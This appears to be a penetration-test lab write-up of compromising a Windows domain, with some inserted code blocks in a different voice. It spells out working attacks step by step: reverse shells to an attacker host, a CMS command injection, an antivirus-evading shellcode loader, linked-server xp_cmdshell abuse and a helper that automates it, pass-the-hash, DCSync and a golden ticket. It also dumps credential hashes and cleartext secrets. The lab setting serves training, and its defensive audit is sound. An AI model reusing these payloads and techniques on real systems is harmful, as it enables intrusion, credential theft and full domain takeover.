env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ansiblesvc may run the following commands on appserver05:


(ALL) NOPASSWD: ALL
ansiblesvc@appserver05:~$ sudo su -
root@appserver05:~#

root@appserver05:~# cat proof.txt


f50e80a9fb44bfb4d440631e796f3f56 (172.16.X.197)

root:$6$veLzkM9YL5o0gWT.$YW5Ou1ImNB5AlItKIcVUKK1eMaXmQOUiKH5uEOKFyRZWXsxXf.XPQvCHeKK..4jX93vTca3LvrpmpsLxKXxPx1:18568:0:99999:7:::

ansiblesvc:$6$pw6sPHO5F2ChVCQW$8PvOIIhOW.0XYRZswcKs8cWD4RQVN.jdt.qt7wzH5FC.NxBIu2wfcOnpsiJ1IT7rLaRRgYY7JXtHHoZGttYns0:18562:0:99999:7:::

Then tommy's credentials found on jump03 work for Windows authentication against both sql03 and sql11:

proxychains python3 /opt/Windows/Impacket/examples/mssqlclient.py tommy:89dsfsji43A@172.16.X.187 -port 1433 -windows-auth
proxychains python3 /opt/Windows/Impacket/examples/mssqlclient.py tommy:89dsfsji43A@172.16.X.188 -port 1433 -windows-auth

ERROR(SQL11\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object


'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

We don’t have permission to enable xp_cmdshell.

So we probably need to do some relaying here again.

Then crackmapexec shows that SMB signing is not required on WEB06:

SMB 172.16.X.194 445 WEB06 [*] Windows 10.0 Build 17763 (name:WEB06) (domain:final.com) (signing:False) (SMBv1:False)

So let's try to relay to that one: start ntlmrelayx targeting WEB06's SMB, then coerce SQL11's service account into authenticating to our host with xp_dirtree:

proxychains python3 /opt/Windows/Impacket/examples/ntlmrelayx.py --no-http-server -smb2support -t smb://172.16.X.194

EXECUTE ('master.sys.xp_dirtree "\\192.168.X.Y\a"')

[*] Authenticating against smb://172.16.X.194 as FINAL/SQLSVC11 SUCCEED
[*] SMBD-Thread-3: Connection from FINAL/SQLSVC11@172.16.X.188 controlled, but there are no more targets left!
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

The relayed authentication succeeds, but SQLSVC11 is not a local administrator on WEB06, so the post-relay action (service creation over DCERPC) is denied.

appserver05 is in the dev.final.com domain, and from the web06 store page earlier I had:

The current release version is 0.4.5.1 which is available on port 8080 from both final.com and dev.final.com

The current insider version is 0.4.7.2 which is available on port 8081 from dev.final.com only

So we can access port 8081 from appserver05.

To setup the proxy, I do:


proxychains sshuttle -v -e "ssh -i id_rsa" -r [email protected] 172.16.X.0/24

Then I can reach http://172.16.X.194:8081/ from Firefox without any SOCKS proxy add-on.

The insider CMS has a ping function. If I enter:

127.0.0.1 && whoami

I get: = 0ms, Maximum = 0ms, Average = 0ms dev\apachesvc

The host parameter is handed to a shell unescaped, so we have command execution as dev\apachesvc. Let's spawn a shell on the web06 machine now:

127.0.0.1 && curl http://192.168.X.Y/nc64.exe -o c:\windows\tasks\nc64.exe

127.0.0.1 && c:\windows\tasks\nc64.exe 192.168.X.Y 80 -e cmd.exe
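The injection above works because the address is spliced into a shell command line. As an added example (not the CMS's code, which the page does not show), here is the assumed vulnerable pattern next to a hardened handler that validates the host against an allow-list and runs ping without a shell; the function names and the Windows `ping -n 1` form are assumptions.

```python
"""Command injection in a ping wrapper: vulnerable and hardened versions (added example)."""
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


class InvalidHost(ValueError):
    """Raised when the submitted host is neither an IP literal nor a DNS name."""


def vulnerable_command(host: str) -> str:
    """Assumed CMS pattern: splice user input into one shell string.

    Executed with subprocess.run(cmd, shell=True), the shell sees "&&" and
    runs whatever follows the address as a second command.
    """
    return f"ping -n 1 {host}"  # Windows ping syntax, as on web06


def validate_host(host: str) -> str:
    """Allow-list: return a canonical IP or a well-formed hostname, else raise."""
    host = host.strip()
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise InvalidHost(f"rejected host argument: {host!r}")


def hardened_command(host: str) -> list:
    """argv list for subprocess without a shell: metacharacters are inert bytes.

    Validation is still needed so the value cannot turn into a ping option
    (for example "-t"), which argv separation alone would not prevent.
    """
    return ["ping", "-n", "1", validate_host(host)]


def run_ping(host: str) -> str:
    """Execute the hardened form; shell=False means no command parsing at all."""
    return subprocess.run(hardened_command(host), capture_output=True, text=True).stdout


if __name__ == "__main__":
    injected = "127.0.0.1 && whoami"  # the input from the page
    print("vulnerable:", vulnerable_command(injected))
    try:
        hardened_command(injected)
    except InvalidHost as err:
        print("hardened:", err)
```

The fix is the combination: an argv list removes the shell, and the allow-list stops option injection and keeps the value from reaching anything that might later interpret it.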

Then I spawn a PowerShell reverse shell with:

IEX(New-Object Net.webclient).downloadString('http://192.168.X.Y/Candlestick.ps1'); IEX(New-Object Net.webclient).downloadString('http://192.168.X.Y/drop4.ps1')

root@kali:~/Ogimmeshellec/Lab# cat drop4.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.X.Y',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

whoami
dev\apachesvc
hostname
web06

more proof.txt
150a6e6452dbe96b8262243842b23911

* Username : sqlsvc01
* Domain : DEV
* NTLM : 077a55c458dc4002dfdc5321a7659526

* Username : apacheSvc
* Domain : DEV
* NTLM : a6a5f008019060ab8079feca697f9f73

Secret : _SC_Apache2.4 / service 'Apache2.4' with username : apacheSvc@dev.final.com
cur/text: fgodSDOJFSdjk53df

Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : sqlsvc01@dev.final.com
cur/text: FDksld894rkjlsdfg

RID : 000003e9 (1001)


User : setup
LM :
NTLM : 42efdb0f0c884f32d51c2d785ea2d174

RID : 000001f4 (500)


User : Administrator
LM :
NTLM : f99529e42ee77dc4704c568ba9320a34

Get-SQLInstanceLocal -Verbose

ComputerName : WEB06
Instance : WEB06\SQLEXPRESS
ServiceDisplayName : SQL Server (SQLEXPRESS)
ServiceName : MSSQL$SQLEXPRESS
ServicePath : "C:\Program Files\Microsoft SQL
Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
ServiceAccount : sqlsvc01@dev.final.com
State : Running

Get-SQLInstanceDomain -Verbose
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 1 instances were found.

ComputerName : web06.dev.final.com
Instance : web06.dev.final.com,1433
DomainAccountSid : 150000052100027816418410210521023312414023318884400
DomainAccount : sqlsvc01
DomainAccountCn : sqlsvc01
Service : MSSQLSvc
Spn : MSSQLSvc/web06.dev.final.com:1433
LastLogon : 2/18/2021 10:35 PM
Description :

Get-SQLServerInfo -Verbose -Instance WEB06


VERBOSE: WEB06 : Connection Success.

ComputerName : WEB06
Instance : WEB06\SQLEXPRESS
DomainName : DEV
ServiceProcessID : 4468
ServiceName : MSSQL$SQLEXPRESS
ServiceAccount : sqlsvc01@dev.final.com
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption :0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Express Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : DEV\apacheSvc
IsSysadmin : No
ActiveSessions :1

Enable Restricted Admin mode so RDP accepts pass-the-hash:

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Then I pass the hash with RDP to web06:

proxychains xfreerdp /v:172.16.X.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore

We first run:

select * from master..sysservers

which lists the linked servers from web06, including SQL03, and shows that rpc out is disabled on the link. Since we can impersonate sa (EXECUTE AS LOGIN = 'sa'), we enable it, enable xp_cmdshell on SQL03 through the link, and then execute commands there:

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''whoami'';') AT SQL03

Gives: final\sqlsvc03

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''powershell.exe iwr -uri http://192.168.X.Y/nc64.exe -o c:\windows\tasks\nc64.exe'';') AT SQL03
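The statements above are one-hop instances of a pattern that breaks easily by hand: every EXEC ('...') AT hop doubles the single quotes of the batch inside it. As an added example (not from the page), this generator builds the same rpc out / xp_cmdshell chain for SQL03 and generalizes it to several linked-server hops; the server names and the sa impersonation are taken from the page, the two-hop chain in main() is hypothetical.

```python
"""Nested EXEC ... AT builder for linked-server command execution (added example)."""
from typing import List


def tsql_quote(batch: str) -> str:
    """Double single quotes so `batch` can sit inside a T-SQL string literal."""
    return batch.replace("'", "''")


def exec_at(batch: str, hops: List[str]) -> str:
    """Run `batch` on the last server in `hops`, passing through each link in order.

    hops=[] returns the batch unchanged; ["SQL03"] runs it on SQL03 over the
    local link; ["SQL03", "SQL11"] runs it on SQL11 via SQL03's link.
    """
    stmt = batch
    for server in reversed(hops):
        stmt = f"EXEC ('{tsql_quote(stmt)}') AT {server}"
    return stmt


def chained_xp_cmdshell(command: str, hops: List[str], impersonate: str = "sa") -> List[str]:
    """Statements that enable rpc out on every link, enable xp_cmdshell at the end, and run `command`."""
    stmts = []
    if impersonate:
        # Requires IMPERSONATE on that login; the page's statements start this way
        stmts.append(f"EXECUTE AS LOGIN = '{tsql_quote(impersonate)}'")
    for i, server in enumerate(hops):
        # 'rpc out' is a property of the link, so it is set on the server that
        # owns the link: the previous hop, or the server we are on for the first hop
        stmts.append(exec_at(
            f"EXEC sp_serveroption '{tsql_quote(server)}', 'rpc out', 'true'", hops[:i]))
    stmts.append(exec_at(
        "sp_configure 'show advanced options', 1; RECONFIGURE; "
        "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;", hops))
    stmts.append(exec_at(f"xp_cmdshell '{tsql_quote(command)}'", hops))
    return stmts


if __name__ == "__main__":
    # One hop, as on the page
    print(";".join(chained_xp_cmdshell("whoami", ["SQL03"])))
    # Two hops (hypothetical chain): through SQL03 to a server linked from it
    print(";".join(chained_xp_cmdshell("whoami", ["SQL03", "SQL11"])))
```

Each added hop doubles the quote depth again, which is why checking the generated text against a one-hop statement you know works is worth doing before pasting a longer chain.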

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.X.Y LPORT=443 -f raw -o chall6.bin
python xorenrypt.py chall6.bin

The loader this time (apple.exe) is the same XOR loader with the VirtualAllocExNuma sandbox check added:

using System;
using System.Text;
using System.Runtime.InteropServices;

namespace gimmeshell
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
        [DllImport("kernel32.dll")]
        static extern IntPtr GetCurrentProcess();

        // Repeating-key XOR; running it twice with the same key restores the plaintext
        private static byte[] xor(byte[] cipher, byte[] key)
        {
            byte[] xored = new byte[cipher.Length];
            for (int i = 0; i < cipher.Length; i++)
            {
                xored[i] = (byte)(cipher[i] ^ key[i % key.Length]);
            }
            return xored;
        }

        static void Main(string[] args)
        {
            // Sandbox check: emulators that lack VirtualAllocExNuma return NULL.
            // IntPtr is a struct, so compare against IntPtr.Zero ("== null" never fires).
            IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
            if (mem == IntPtr.Zero)
            {
                return;
            }

            // Same key used by xorenrypt.py when chall6.bin was encoded
            string key = "a70f8922029506d2e37f375fd638cdf9e2c039c8a1e6e01189eeb4efb";
            byte[] xorbuf = { xorEncryptedShellcode };
            byte[] buf = xor(xorbuf, Encoding.ASCII.GetBytes(key));
            int size = buf.Length;

            // MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE; allocate the real
            // payload size rather than a fixed 0x1000
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x3000, 0x40);
            Marshal.Copy(buf, 0, addr, size);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''powershell.exe iwr -uri http://192.168.X.Y/apple.exe -o c:\windows\tasks\apple.exe'';') AT SQL03

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''c:\windows\tasks\apple.exe'';') AT SQL03
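As an added defensive check, not part of the original writeup: the chain above only works because three things are true on the SQL Server it connects to. The caller can EXECUTE AS LOGIN = 'sa', a linked server entry exists with 'rpc out' enabled (which is what allows EXEC (...) AT SQL03 to run remote batches), and nothing stops xp_cmdshell from being switched on. The T-SQL below audits each of those with the standard catalog views (sys.servers, sys.server_permissions, sys.server_principals, sys.configurations) and then reverts the two settings. The linked server name SQL03 is taken from the writeup; everything else is generic. Run the same audit on the linked target as well, since the chain enables xp_cmdshell there too.

```sql
-- Added audit script (not from the writeup). Run on the instance that holds the
-- linked-server definition, i.e. the one the chain connects to as 'sa'.

-- 1. Linked servers and whether RPC OUT is enabled on them.
--    is_rpc_out_enabled = 1 is the precondition for EXEC (...) AT <server>.
SELECT name,
       product,
       is_linked,
       is_rpc_out_enabled,
       is_data_access_enabled
FROM sys.servers
WHERE is_linked = 1;

-- 2. Who may impersonate another server-level login (EXECUTE AS LOGIN).
--    A grantee that can impersonate 'sa' is, in effect, 'sa'.
SELECT grantee.name    AS grantee,
       target.name     AS can_impersonate,
       perm.state_desc
FROM sys.server_permissions AS perm
JOIN sys.server_principals  AS grantee ON grantee.principal_id = perm.grantee_principal_id
JOIN sys.server_principals  AS target  ON target.principal_id  = perm.major_id
WHERE perm.class_desc      = 'SERVER_PRINCIPAL'
  AND perm.permission_name = 'IMPERSONATE';

-- 3. Current state of the two options the chain toggles.
--    value_in_use = 1 for xp_cmdshell means OS command execution is live.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 4. Remediation: turn xp_cmdshell back off (advanced options must be visible to
--    do so), hide advanced options again, and disable RPC OUT on the linked server.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
EXEC sp_serveroption 'SQL03', 'rpc out', 'false';
```

Each sp_configure change is also written to the SQL Server ERRORLOG as a line of the form "Configuration option 'xp_cmdshell' changed from 0 to 1", which is a cheap thing to alert on: in most estates that option should never flip at runtime, and certainly not from a linked-server session.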

meterpreter > getuid
Server username: FINAL\sqlsvc03
meterpreter > sysinfo
Computer : SQL03
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : FINAL
Logged On Users : 7
Meterpreter : x64/windows

more c:\users\sqlsvc03\desktop\local.txt
299ca8cec8c772177e8103aa21363b63

SeImpersonatePrivilege Impersonate a client after authentication Enabled

So let's try the same approach as earlier with PrintSpoofer.

c:\windows\tasks\PrintRulon.exe \\.\pipe\test\pipe\spoolss
^Z
Background channel 1? [y/N] y
meterpreter > shell
Process 4804 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>c:\windows\tasks\SpoolSample.exe sql03 sql03/pipe/test
c:\windows\tasks\SpoolSample.exe sql03 sql03/pipe/test
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function

C:\Windows\system32>^Z
Background channel 2? [y/N] y
meterpreter > channel -i 1
Interacting with channel 1...

Found sid S-1-5-18
Impersonated user is: NT AUTHORITY\SYSTEM
PS C:\users>
[*] https://192.168.X.Y:443 handling request from 192.168.x.189; (UUID: eeyip861) Staging x64 payload (202329 bytes) ...
[*] Meterpreter session 2 opened (192.168.X.Y:443 -> 192.168.x.189:63856) at 2021-02-20 09:44:07 +0100

2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ SQL03 192.168.X.Y:443 -> 192.168.x.189:63856 (172.16.X.187)

more c:\users\administrator\desktop\proof.txt
ec8dce67fea16d638ade1419bfe3526e
* Username : sqlsvc03
* Domain : FINAL
* NTLM : 77f944ff6e0c0ed0c83dcef57bdf9298

Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : [email protected]
cur/text: 89sdfDSFksolds34f

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 8388d07604009d14cbb78f7d37b9e887

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

proxychains xfreerdp /v:172.16.X.187 /u:administrator /pth:8388d07604009d14cbb78f7d37b9e887 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore

But there are no linked servers here.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
sql11

more c:\users\administrator\desktop\proof.txt
c5cd6b2f7d31f8f4b392c49190ac864b

From BloodHound earlier, we saw that tina (who is a domain admin) had a session on sql11, so let's dump hashes.
* Username : tina
* Domain : FINAL
* NTLM : 1d4c153225b424290188504b9e0541eb

proxychains python3 /opt/Windows/Impacket/examples/psexec.py -hashes :1d4c153225b424290188504b9e0541eb [email protected]
nt authority\system
PS C:\> hostname
ostname
dc01

more c:\users\administrator\desktop\proof.txt
716455142324167230fb17bb3a3df487

The last machine is the DC in the dev domain. Let's dump hashes now with DCSync:
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all /csv" "exit"
[DC] 'final.com' will be the domain
[DC] 'dc01.final.com' will be the DC server
[DC] Exporting domain 'final.com'
502 krbtgt 405854caaf49b41e0e585369a001f114 514
1110 nina 25af00893895d3d871e625c5d4261539 66048
1000 DC01$ b888702a6a53dd77fea9f6d4ae1342d9 532480
500 Administrator 0474d3f0a74d30f13f1fec243e8ac3cb 66048
1114 sqlsvc11 c0f6442ea39956aebf28219639ba9953 66048
1120 ANSIBLE06$ 1bca5d43a0a0a71e5e97602585c248fd 69632
1115 adminWebSvc b0df1cb0819ca0b7d476d4c868175b94 66048
1113 sqlsvc03 77f944ff6e0c0ed0c83dcef57bdf9298 66048
1103 DEV$ 5156f91db57d21698a9fa0e61c889b02 2080
1117 SQL11$ b060949bbbbbb56614bd3ad7e28a2cb0 4096
1118 WEB05$ 1e9679e6dfe938501d519dd10a1962d5 4096
1119 JUMP03$ 4ac261a53476959a56b34c1606e08974 4096
1116 SQL03$ 5b685060ce6943a1a1570a8981d15b96 4096
1112 tommy 5ad27ee8000951e0669fab25f73f9d8a 66048
1109 tina 1d4c153225b424290188504b9e0541eb 66048

I then check for the Enterprise Admins group in dev.final.com, but there are none there; however:
The members of the group ENTERPRISE ADMINS@FINAL.COM have admin rights to the computer DC02.DEV.FINAL.COM.

This means we can supply the SID of that Enterprise Admins group via /sids.

.\mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"
more \\dc02.dev.final.com\c$\users\administrator\desktop\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2

invoke-command -computername dc02.dev.final.com -scriptblock {powershell.exe iwr -uri http://192.168.X.Y/nc64.exe -o c:\users\administrator\nc64.exe}

invoke-command -computername dc02.dev.final.com -scriptblock {c:\users\administrator\nc64.exe 192.168.X.Y 80 -e cmd.exe}
